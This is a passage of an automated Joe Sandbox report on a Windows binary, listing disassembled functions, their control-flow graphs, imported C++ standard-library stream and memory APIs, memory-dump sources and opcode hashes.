208737 1848->1854 1855 20873c-20874f 1848->1855 1849->1848 1850->1851 1856 2086a2 1850->1856 1857 208688 1851->1857 1852->1846 1852->1853 1859 208659-20865c 1853->1859 1860 20865e-208664 1853->1860 1854->1855 1858 2086a4-2086a6 1856->1858 1861 20868b-2086f7 1857->1861 1858->1861 1863 2086a8 1858->1863 1859->1861 1860->1845 1861->1844 1864 2086aa-2086ac 1863->1864 1865 2086ae-2086cd ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z 1863->1865 1864->1861 1864->1865 1865->1857 1866 2086cf-2086d5 1865->1866 1866->1858
                                                      APIs
                                                      • ?good@ios_base@std@@QBE_NXZ.MSVCP140(3BC7ADCC,?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 002085D0
                                                      • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ.MSVCP140(?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 002085EB
                                                      • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 002085F8
                                                      • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(00000000,?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 0020864E
                                                      • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP140(?,000000FF,00000000,?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 00208677
                                                      • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?,?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 002086C1
                                                      • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000,?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 00208708
                                                      • ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 0020870E
                                                      • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 0020871D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@V12@
                                                      • String ID:
                                                      • API String ID: 3274656010-0
                                                      • Opcode ID: eb4cf05cb41b542053a6e85d2c8a78b8029f1e63c37b549a814e3b5f2a9410cd
                                                      • Instruction ID: 44027a2a665117a8d6f02d0b565943fe74e86dccbd940e4311113bbc208fc42d
                                                      • Opcode Fuzzy Hash: eb4cf05cb41b542053a6e85d2c8a78b8029f1e63c37b549a814e3b5f2a9410cd
                                                      • Instruction Fuzzy Hash: F8717F75A10601CFCB14CF58D994B6ABBB1BF49314F2A8299D856AB3E3CB329C55CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00208D10 Relevance: 13.7, APIs: 9, Instructions: 154COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1867 208d10-208d55 1868 208d57 1867->1868 1869 208d68 1867->1869 1870 208d59-208d5b 1868->1870 1871 208d5d-208d62 1868->1871 1872 208d6a-208d73 1869->1872 1870->1869 1870->1871 1871->1869 1873 208d64-208d66 1871->1873 1874 208d75 1872->1874 1875 208d7a-208d90 ?good@ios_base@std@@QBE_NXZ 1872->1875 1873->1872 1874->1875 1876 208d92-208d9d 1875->1876 1877 208dba-208dc6 1875->1877 1880 208db8 1876->1880 1881 208d9f-208da1 1876->1881 1878 208dd2-208de7 1877->1878 1879 208dc8-208dcd 1877->1879 1884 208de9 1878->1884 1885 208e1f-208e39 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z 1878->1885 1883 208ea6-208ec1 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z ?uncaught_exception@std@@YA_NXZ 1879->1883 1880->1877 1881->1880 1882 208da3-208db6 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ ?good@ios_base@std@@QBE_NXZ 1881->1882 1882->1877 1886 208ec3-208ec5 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ 1883->1886 1887 208ecb-208edd 1883->1887 1888 208df0-208df2 1884->1888 1889 208e65 1885->1889 1890 208e3b-208e3d 1885->1890 1886->1887 1892 208ee4-208ef7 1887->1892 1893 208edf 1887->1893 1888->1885 1894 208df4-208e10 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z 1888->1894 1891 208e68-208e9f 1889->1891 1890->1889 1895 208e3f 1890->1895 1891->1883 1893->1892 1897 208e12-208e1a 1894->1897 1898 208e1c-208e1d 1894->1898 1899 208e40-208e42 1895->1899 1897->1899 1898->1888 1899->1891 1900 208e44-208e60 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z 1899->1900 1900->1889 1901 208e62-208e63 1900->1901 1901->1899
                                                      APIs
                                                      • ?good@ios_base@std@@QBE_NXZ.MSVCP140(3BC7ADCC,?,?), ref: 00208D88
                                                      • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ.MSVCP140(?,?), ref: 00208DA3
                                                      • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,?), ref: 00208DB0
                                                      • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?,?,?), ref: 00208E07
                                                      • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP140(?,?,00000000,?,?), ref: 00208E30
                                                      • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?,?,?), ref: 00208E57
                                                      • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000,?,?), ref: 00208EB0
                                                      • ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,?), ref: 00208EB6
                                                      • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,?), ref: 00208EC5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@V12@
                                                      • String ID:
                                                      • API String ID: 3274656010-0
                                                      • Opcode ID: eac4c0eb286012fe33f475bfa561d200e1ae9609c508d39ba83645e36a5e5283
                                                      • Instruction ID: 5f868cc89252dd58a10df2d02c5d6831228d0492ef754fb7486d1552421f43bd
                                                      • Opcode Fuzzy Hash: eac4c0eb286012fe33f475bfa561d200e1ae9609c508d39ba83645e36a5e5283
                                                      • Instruction Fuzzy Hash: AF515E74615605DFCB14CF68D588BA9BBB1FF08314F248269E9569B7E2CB31DD21CB80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002083F0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 101COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • ?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z.MSVCP140(00000021,?,00000040,3BC7ADCC,?,?,?,00202377,?,00000021,00000000), ref: 00208430
                                                      • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140(?,?,?,?,00202377,?,00000021,00000000), ref: 0020844D
                                                      • _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,?,?), ref: 00208475
                                                      • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,00202377,?,00000021,00000000), ref: 002084BA
                                                        • Part of subcall function 00208780: ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,3BC7ADCC,00000000,P ,?,0020BB56,000000FF,?,002084CE), ref: 002087B5
                                                        • Part of subcall function 00208780: ??Bid@locale@std@@QAEIXZ.MSVCP140(?,0020BB56,000000FF), ref: 002087D0
                                                        • Part of subcall function 00208780: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,0020BB56,000000FF), ref: 002087FB
                                                        • Part of subcall function 00208780: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,0020BB56,000000FF), ref: 0020881E
                                                        • Part of subcall function 00208780: std::_Facet_Register.LIBCPMT ref: 00208837
                                                        • Part of subcall function 00208780: ??1_Lockit@std@@QAE@XZ.MSVCP140(?,0020BB56,000000FF), ref: 00208852
                                                      • ?always_noconv@codecvt_base@std@@QBE_NXZ.MSVCP140(?,?,?,?,?,?,?,?,00202377,?,00000021), ref: 002084D2
                                                      • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140(?,?,?,?,?,?,?,?,00202377,?,00000021), ref: 002084EA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: D@std@@@std@@U?$char_traits@$Init@?$basic_streambuf@Lockit@std@@$??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@Bid@locale@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
                                                      • String ID: w#
                                                      • API String ID: 3911317180-725151854
                                                      • Opcode ID: c0de788a99eb60ab3333a0844af7c1cd9cbe8014246989742c1f932dc25b9207
                                                      • Instruction ID: 151369d7a9a4c8c59530a7192b8d7b8ed06d73f83759197640356df126119e49
                                                      • Opcode Fuzzy Hash: c0de788a99eb60ab3333a0844af7c1cd9cbe8014246989742c1f932dc25b9207
                                                      • Instruction Fuzzy Hash: 5341F4B4A107059FDB24CF69D848BABBBF5FB48710F10462EE84697792DB74A904CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002075C0 Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1918 2075c0-2075f6 1919 2075f8-207602 1918->1919 1920 20761b-20761f 1918->1920 1919->1920 1923 207604-207616 1919->1923 1921 207621-207624 1920->1921 1922 207629-207631 1920->1922 1924 20780e-207828 call 20974b 1921->1924 1925 207633-207645 1922->1925 1926 207647-20764e 1922->1926 1923->1924 1925->1926 1928 207650-20765d fgetc 1926->1928 1929 207667-207697 fgetc 1926->1929 1928->1921 1931 20765f-207662 1928->1931 1932 207782 1929->1932 1933 20769d 1929->1933 1931->1924 1934 207785-20778b 1932->1934 1935 2076a0-2076ab 1933->1935 1936 20780c 1934->1936 1937 20778d-207799 1934->1937 1938 2076ca-2076d8 call 208960 1935->1938 1939 2076ad-2076c8 1935->1939 1936->1924 1940 207802-207809 call 209aef 1937->1940 1941 20779b-2077a9 1937->1941 1942 2076dd-207716 ?in@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD@Z 1938->1942 1939->1942 1940->1936 1941->1940 1944 2077ab _invalid_parameter_noinfo_noreturn 1941->1944 1946 207721-20772a 1942->1946 1947 207718-20771b 1942->1947 1950 2077b1-2077b4 1944->1950 1948 207730-20777c memcpy fgetc 1946->1948 1949 2077c6-2077da 1946->1949 1947->1946 1947->1950 1948->1932 1948->1935 1953 2077fc-207800 1949->1953 1954 2077dc 1949->1954 1950->1932 1952 2077b6-2077c4 1950->1952 1952->1934 1953->1934 1955 2077e0-2077f5 ungetc 1954->1955 1955->1953 1956 2077f7-2077fa 1955->1956 1956->1955
                                                      APIs
                                                      • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00207651
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: fgetc
                                                      • String ID:
                                                      • API String ID: 2807381905-0
                                                      • Opcode ID: 07cb3206c8e2417a285524cdf0b91258673ca71795d9e52fd1b3704588639676
                                                      • Instruction ID: 40abcbb2c1c2db9317d672cf055b88796a22789ce0178d5957d93c326af6129a
                                                      • Opcode Fuzzy Hash: 07cb3206c8e2417a285524cdf0b91258673ca71795d9e52fd1b3704588639676
                                                      • Instruction Fuzzy Hash: FD819271D1460ADFCB15CFA8C884AAEF7B9FF08314F248219E426A7692D731B955CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00209570 Relevance: 7.6, APIs: 5, Instructions: 125COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1957 209570-209592 1958 2096a6 call 208d00 1957->1958 1959 209598-2095b0 1957->1959 1966 2096ab-2096b1 call 201e40 1958->1966 1961 2095b2-2095b7 1959->1961 1962 2095d8-2095e8 1959->1962 1963 2095bc-2095bd call 209759 1961->1963 1964 2095f7-2095f9 1962->1964 1965 2095ea-2095ef 1962->1965 1972 2095c2-2095c7 1963->1972 1969 209608 1964->1969 1970 2095fb-209606 call 209759 1964->1970 1965->1966 1968 2095f5 1965->1968 1968->1963 1974 20960a-20961f 1969->1974 1970->1974 1976 2096a0 _invalid_parameter_noinfo_noreturn 1972->1976 1977 2095cd-2095d6 1972->1977 1979 209630-209650 memcpy * 2 1974->1979 1980 209621-20962e memcpy 1974->1980 1976->1958 1977->1974 1981 209653-209657 1979->1981 1980->1981 1982 209682-20969d 1981->1982 1983 209659-209664 1981->1983 1984 209666-209674 1983->1984 1985 209678-20967f call 209aef 1983->1985 1984->1976 1986 209676 1984->1986 1985->1982 1986->1985
                                                      APIs
                                                      • memcpy.VCRUNTIME140(00000000,00000000,?,00000000,00000000,00000001,?,00000021,00000000), ref: 00209626
                                                      • memcpy.VCRUNTIME140(00000000,00000000,00000021,00000000,00000000,00000001,?,00000021,00000000), ref: 00209635
                                                      • memcpy.VCRUNTIME140(00000001,00000021,?,00000000,00000000,00000021,00000000,00000000,00000001,?,00000021,00000000), ref: 0020964B
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000000,00000000,00000001,?,00000021,00000000), ref: 002096A0
                                                        • Part of subcall function 00209759: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00208010,00000001,?,?,?), ref: 0020976E
                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 002096AB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                      • String ID:
                                                      • API String ID: 1155477157-0
                                                      • Opcode ID: 3ad67ef80ee9d0dadd670b533e54ca5beb498338b041045b01a14cccf867aaa2
                                                      • Instruction ID: 9e2129e9a3607c4d39eaafb90d9536cb1b3588ee03e040ac733cb345879b3e7a
                                                      • Opcode Fuzzy Hash: 3ad67ef80ee9d0dadd670b533e54ca5beb498338b041045b01a14cccf867aaa2
                                                      • Instruction Fuzzy Hash: 9741F772A202019FC704DF3CCD8596EBBA9EF893107648268E816DB3D7DA71ED91CB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00206EC0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(3BC7ADCC,00000000,?), ref: 00206F0B
                                                      • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,00000000,00000000), ref: 00206F29
                                                      • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 00206F53
                                                      • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140 ref: 00206F69
                                                      • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,00000021,00000032), ref: 00206FAB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Init@?$basic_streambuf@V?$basic_streambuf@
                                                      • String ID:
                                                      • API String ID: 1830095303-0
                                                      • Opcode ID: 307615c9ce4bb09b817469d3ce8187c94211f4ecc7a7b8eaf3677c21139889c6
                                                      • Instruction ID: 07f460cb8236817013bf51794c63138f5e781f329c6e553fbe3418d2e0aa2e4c
                                                      • Opcode Fuzzy Hash: 307615c9ce4bb09b817469d3ce8187c94211f4ecc7a7b8eaf3677c21139889c6
                                                      • Instruction Fuzzy Hash: A63155B4600306DFDB14CF18D888B5AFBF9FF48314F20865AE90687792C7B1A954CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00209759 Relevance: 7.6, APIs: 5, Instructions: 65COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1996 209759-20975c 1997 20976b-209776 malloc 1996->1997 1998 209778-209779 1997->1998 1999 20975e-209769 _callnewh 1997->1999 1999->1997 2000 20977a-20977e 1999->2000 2001 201e40-201e91 call 201e20 _CxxThrowException __std_exception_copy 2000->2001 2002 209784-209eca call 209e96 _CxxThrowException 2000->2002
                                                      APIs
                                                      • _CxxThrowException.VCRUNTIME140(?,00210348), ref: 00201E57
                                                      • __std_exception_copy.VCRUNTIME140(?,?,?,?,?,00210348), ref: 00201E7E
                                                      • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00208010,00000001,?,?,?), ref: 00209761
                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00208010,00000001,?,?,?), ref: 0020976E
                                                      • _CxxThrowException.VCRUNTIME140(?,002102AC), ref: 00209EC5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: ExceptionThrow$__std_exception_copy_callnewhmalloc
                                                      • String ID:
                                                      • API String ID: 3601187372-0
                                                      • Opcode ID: a582d4c86f8cc52e6204d45c24da4952a3e2cd6582ee715f3017cc73127c8d1b
                                                      • Instruction ID: 397b7c98ae66aafec7a3dcdfcff4543b0edfebcaa80d485108bf07c78507fc0f
                                                      • Opcode Fuzzy Hash: a582d4c86f8cc52e6204d45c24da4952a3e2cd6582ee715f3017cc73127c8d1b
                                                      • Instruction Fuzzy Hash: 6201C87583030DBBCB14AFE4EC4588DB7AC9E01350B604625F915DA5D3EBB0E9B48AD5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002073A0 Relevance: 4.6, APIs: 3, Instructions: 104fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2008 2073a0-2073b2 2009 2073b4-2073c9 ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z 2008->2009 2010 2073cc-2073ec 2008->2010 2011 2073f4-2073f6 2010->2011 2012 2073ee-2073f2 2010->2012 2013 2073fa-207409 2011->2013 2012->2013 2014 207462 2013->2014 2015 20740b 2013->2015 2016 207465-207467 2014->2016 2017 207411-207413 2015->2017 2018 20740d-20740f 2015->2018 2019 207489-20749b 2016->2019 2020 207469 2016->2020 2021 207415 2017->2021 2022 20745d-207460 2017->2022 2018->2014 2018->2017 2023 20746f-207474 2020->2023 2024 20746b-20746d 2020->2024 2025 207417-207419 2021->2025 2026 20741b-20741d 2021->2026 2022->2023 2023->2019 2029 207476-207486 fwrite 2023->2029 2024->2019 2024->2023 2025->2022 2025->2026 2027 20742f-20745b memcpy 2026->2027 2028 20741f 2026->2028 2027->2016 2030 207421-207423 2028->2030 2031 207425-20742b 2028->2031 2029->2019 2030->2027 2030->2031 2031->2027
                                                      APIs
                                                      • ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z.MSVCP140(?,?,?), ref: 002073BD
                                                      • memcpy.VCRUNTIME140(?,?,00000000), ref: 00207437
                                                      • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 0020747B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: ?xsputn@?$basic_streambuf@D@std@@@std@@U?$char_traits@fwritememcpy
                                                      • String ID:
                                                      • API String ID: 3343712378-0
                                                      • Opcode ID: eeccb1f6c8b1e5acb00948e8a7597ff3bc367f7d694774705a5e04e1744bd653
                                                      • Instruction ID: 7fbfef0f6cb5cbea03d3a49456b64b2681cb316c60ff01e05cdc13f7790b036e
                                                      • Opcode Fuzzy Hash: eeccb1f6c8b1e5acb00948e8a7597ff3bc367f7d694774705a5e04e1744bd653
                                                      • Instruction Fuzzy Hash: D7314872A287069BCB14CF1DD88096ABBF5FF88710F044669ED4997292D730ED248B92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00208750 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD@Z.MSVCP140(0000000A), ref: 00208760
                                                      • ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@D@Z.MSVCP140 ref: 0020876C
                                                      • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ.MSVCP140 ref: 00208774
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: D@std@@@std@@U?$char_traits@$V12@$?flush@?$basic_ostream@?put@?$basic_ostream@?widen@?$basic_ios@
                                                      • String ID:
                                                      • API String ID: 1875450691-0
                                                      • Opcode ID: f36365f763f5c6dcd696f96eac188fc7132cca7a2800e7b660edca959f6920d0
                                                      • Instruction ID: 68cc7ecdf2ba2b93f7d6c8b4c861634fbc5bf0ff6a7df4d3224c93b267671739
                                                      • Opcode Fuzzy Hash: f36365f763f5c6dcd696f96eac188fc7132cca7a2800e7b660edca959f6920d0
                                                      • Instruction Fuzzy Hash: E5D05B75300324DBC60C5B58FC1CA6C7799EB49755B104319FA4AC7392CB255911CBD5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00208310 Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2033 208310-208318 2034 20831a-208323 2033->2034 2035 20835d 2033->2035 2036 208325-208337 2034->2036 2037 208339-20835b call 208240 fclose 2034->2037 2038 20835f-208393 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ 2035->2038 2036->2037 2037->2038
                                                      APIs
